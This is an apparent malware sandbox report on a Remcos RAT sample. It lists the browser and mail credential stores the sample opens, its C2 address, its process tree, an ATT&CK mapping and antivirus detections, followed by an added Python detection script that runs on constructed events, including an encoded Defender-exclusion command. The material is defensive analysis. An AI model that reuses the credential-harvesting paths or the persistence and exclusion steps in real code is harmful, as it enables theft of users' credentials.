                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,8_2_0041A045
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041B69E GetUserNameW,8_2_0041B69E
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_0044942D
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.7820000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_0040BA4D
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_0040BB6B
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: \key3.db 8_2_0040BB6B
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: ESMTPPassword 17_2_004033F0
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 17_2_00402DB3
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 17_2_00402DB3
Source: Yara match | File source: Process Memory Space: DGlxtFUfY.exe PID: 1148, type: MEMORYSTR

                      Remote Access Functionality

Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9Y
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9Y
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.7820000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: cmd.exe 8_2_0040569A
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (11) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping (2) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (12) | Windows Service (1) | Bypass User Account Control (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (211) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (2) | Exfiltration Over Bluetooth | Defacement (1)
Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Access Token Manipulation (1) | Obfuscated Files or Information (4) | Credentials in Registry (2) | System Service Discovery (1) | SMB/Windows Admin Shares | Email Collection (1) | Remote Access Software (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Service Execution (2) | Login Hook | Windows Service (1) | Software Packing (22) | Credentials In Files (3) | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture (211) | Non-Application Layer Protocol (2) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (422) | Timestomp (1) | LSA Secrets | System Information Discovery (38) | SSH | Clipboard Data (3) | Application Layer Protocol (12) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Scheduled Task/Job (1) | DLL Side-Loading (1) | Cached Domain Credentials | Security Software Discovery (141) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Bypass User Account Control (1) | DCSync | Virtualization/Sandbox Evasion (41) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Masquerading (1) | Proc Filesystem | Process Discovery (4) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Virtualization/Sandbox Evasion (41) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Access Token Manipulation (1) | Network Sniffing | System Owner/User Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Process Injection (422) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph (ID: 1569374; sample: LdSbZG1iH6.exe; start date: 05/12/2024; architecture: WINDOWS; score: 100)

Sample-level findings: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures. Resolved domain: geoplugin.net.

Process tree, rebuilt from the graph (node numbers are the graph's own; the number in parentheses after a process is the graph's per-node event count):

2  Start: LdSbZG1iH6.exe
  - 9  LdSbZG1iH6.exe (7)
      dropped: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe (PE32)
      dropped: C:\Users\...\DGlxtFUfY.exe:Zone.Identifier (ASCII)
      dropped: C:\Users\user\AppData\Local\...\tmpD8DB.tmp (XML)
      dropped: C:\Users\user\AppData\...\LdSbZG1iH6.exe.log (ASCII)
      signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 7 other signatures
      - 15  LdSbZG1iH6.exe (2)
          signatures: Writes to foreign memory regions
          - 30  iexplore.exe
      - 18  powershell.exe (23)
          signatures: Loading BitLocker PowerShell Module
          - 47  2 other processes
      - 20  powershell.exe (23)
          - 32  conhost.exe
      - 22  schtasks.exe (1)
          - 34  conhost.exe
  - 13  DGlxtFUfY.exe (5)
      signatures: Multi AV Scanner detection for dropped file; Tries to steal Mail credentials (via file registry); Machine Learning detection for dropped file
      - 24  DGlxtFUfY.exe
          network: 192.3.64.152 (ports 2559, 49735, 49741), AS-COLOCROSSINGUS, United States
          network: geoplugin.net 178.237.33.50 (ports 49736, 80), ATOM86-ASATOM86NL, Netherlands
          dropped: C:\ProgramData\remcos\logs.dat (data)
          signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Installs a global keyboard hook
          - 36  DGlxtFUfY.exe
              signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
          - 39  DGlxtFUfY.exe
              signatures: Tries to harvest and steal browser information (history, passwords, etc)
          - 41  DGlxtFUfY.exe
              - 49  WerFault.exe
          - 43  WerFault.exe
      - 28  schtasks.exe
          - 45  conhost.exe
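The process tree above is the report's record of what the sample did. The script below is an added example, not part of the Joe Sandbox report, showing how those observations become detection logic over endpoint telemetry. It takes the IOCs the report lists (the 192.3.64.152 endpoint, the C:\ProgramData\remcos\logs.dat file, the DGlxtFUfY.exe second stage in AppData\Roaming) and the two Sigma-flagged behaviours (a base64-encoded Add-MpPreference exclusion and a scheduled task created from a .tmp XML in a temp directory) and runs them over constructed Sysmon-style events. The event field names, the task name, the exact Temp directory of the .tmp file (the report truncates that path) and the reading of 2559 as the remote port, with 49735 and 49741 as ephemeral client ports, are assumptions of this example.

```python
"""Match endpoint telemetry against the behaviours and IOCs in the report above.

Added example, not part of the Joe Sandbox report. The event records below are
constructed to resemble Sysmon-style process, network and file events; the
field names (type, pid, image, cmdline, dst_ip, dst_port, target_file) are this
example's own and must be mapped onto your telemetry. IOC values come from the
report. Assumption: of the ports 2559, 49735, 49741 listed for 192.3.64.152,
2559 is taken as the remote port and the other two as ephemeral client ports.
"""
import base64
import re

# From the report: C2 endpoint, Remcos keylog file, dropped second stage.
C2_ENDPOINTS = {("192.3.64.152", 2559)}
REMCOS_LOG_PATH = r"c:\programdata\remcos\logs.dat"
DROPPED_PAYLOAD = r"\appdata\roaming\dglxtfufy.exe"

# powershell -e / -ec / -en / -enc / -EncodedCommand <base64>
_ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
# a .tmp file under any ...\Temp\ directory (the "task from temp location" pattern)
_TEMP_TMP_XML = re.compile(r'\\temp\\[^\s"]+\.tmp', re.I)


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE) or '' if none."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify_event(evt):
    """Return the names of the report behaviours this single event matches."""
    hits = []
    kind = evt.get("type")
    image = evt.get("image", "").lower()
    cmd = evt.get("cmdline", "")
    if kind == "process":
        if image.endswith("powershell.exe"):
            # Sigma: "Powershell Base64 Encoded MpPreference Cmdlet"
            script = decode_encoded_powershell(cmd) or cmd
            if re.search(r"add-mppreference\b.*-exclusionpath", script, re.I):
                hits.append("defender_exclusion_added")
        elif image.endswith("schtasks.exe"):
            # Sigma: "Scheduled temp file as task from temp location"
            if re.search(r"/create\b", cmd, re.I) and _TEMP_TMP_XML.search(cmd):
                hits.append("scheduled_task_from_temp_xml")
        elif DROPPED_PAYLOAD in image:
            hits.append("dropped_payload_executed")
    elif kind == "network":
        if (evt.get("dst_ip"), evt.get("dst_port")) in C2_ENDPOINTS:
            hits.append("remcos_c2_connection")
    elif kind == "file":
        if evt.get("target_file", "").lower() == REMCOS_LOG_PATH:
            hits.append("remcos_keylog_file")
    return hits


def scan(events):
    """Return (pid, behaviour) pairs for every event that matches."""
    return [(e.get("pid"), h) for e in events for h in classify_event(e)]


# Constructed sample telemetry (not from the report). The encoded command is
# built here so the base64 is guaranteed to be valid UTF-16LE; the exclusion
# path, task name and Temp directory are this example's assumptions.
SAMPLE_ENCODED_COMMAND = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"type": "process", "pid": 18, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -enc " + SAMPLE_ENCODED_COMMAND},
    {"type": "process", "pid": 22, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "example-task" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"'},
    {"type": "process", "pid": 13, "image": r"C:\Users\user\AppData\Roaming\DGlxtFUfY.exe", "cmdline": "DGlxtFUfY.exe"},
    {"type": "network", "pid": 24, "dst_ip": "192.3.64.152", "dst_port": 2559},
    {"type": "network", "pid": 24, "dst_ip": "178.237.33.50", "dst_port": 80},   # geoplugin.net, not C2
    {"type": "file", "pid": 24, "target_file": r"C:\ProgramData\remcos\logs.dat"},
    {"type": "process", "pid": 99, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, behaviour in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {behaviour}")
```

The geoplugin.net request is deliberately left unmatched: the report marks that host as not malicious, and Remcos uses it only for geolocation, so alerting on it alone would fire on legitimate software as well. The encoded-command decoder is what makes the Defender-exclusion rule work at all; a plain substring match on the command line would miss the base64 form the report flags.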



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
LdSbZG1iH6.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
LdSbZG1iH6.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc | 0% | Avira URL Cloud | safe
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742 | 0% | Avira URL Cloud | safe
http://www.sakkal.com(; | 0% | Avira URL Cloud | safe
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d | 0% | Avira URL Cloud | safe
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68 | 0% | Avira URL Cloud | safe
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d | 0% | Avira URL Cloud | safe
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326 | 0% | Avira URL Cloud | safe
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03 | 0% | Avira URL Cloud | safe
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7 | 0% | Avira URL Cloud | safe
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437 | 0% | Avira URL Cloud | safe
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5 | 0% | Avira URL Cloud | safe

Note that the static ReversingLabs label (AgentTesla) and the sandbox's family classification (Remcos, from the extracted malware configuration and the Yara matches listed above) disagree; the behavioural evidence and extracted configuration are the authoritative family attribution here, and the vendor label should not be used on its own for triage.
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W | bhvD3AB.tmp.16.dr | false | | high
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad | bhvD3AB.tmp.16.dr | false | | high
http://www.fontbureau.com/designers? | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingth | bhvD3AB.tmp.16.dr | false | | high
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net | DGlxtFUfY.exe, 00000010.00000002.2263031169.0000000000794000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingaotak | bhvD3AB.tmp.16.dr | false | | high
https://deff.nelreports.net/api/report?cat=msn | bhvD3AB.tmp.16.dr | false | | high
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr | bhvD3AB.tmp.16.dr | false | | high
http://www.goodfont.co.kr | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742 | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr | bhvD3AB.tmp.16.dr | false | | high
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51 | bhvD3AB.tmp.16.dr | false | | high
http://www.sajatypeworks.com | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c | bhvD3AB.tmp.16.dr | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | LdSbZG1iH6.exe, 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://maps.windows.com/windows-app-web-link | bhvD3AB.tmp.16.dr | false | | high
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhvD3AB.tmp.16.dr | false | | high
http://www.galapagosdesign.com/DPlease | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com(; | LdSbZG1iH6.exe, 00000000.00000002.1994602032.00000000058F4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8 | bhvD3AB.tmp.16.dr | false | | high
https://login.yahoo.com/config/login | DGlxtFUfY.exe | false | | high
http://www.fonts.com | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net/ | DGlxtFUfY.exe, 00000011.00000002.2259100532.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | LdSbZG1iH6.exe, 00000000.00000002.1990255245.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2037378445.0000000002796000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d | bhvD3AB.tmp.16.dr | false | | high
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | bhvD3AB.tmp.16.dr | false | | high
https://www.office.com/ | bhvD3AB.tmp.16.dr | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8 | bhvD3AB.tmp.16.dr | false | | high
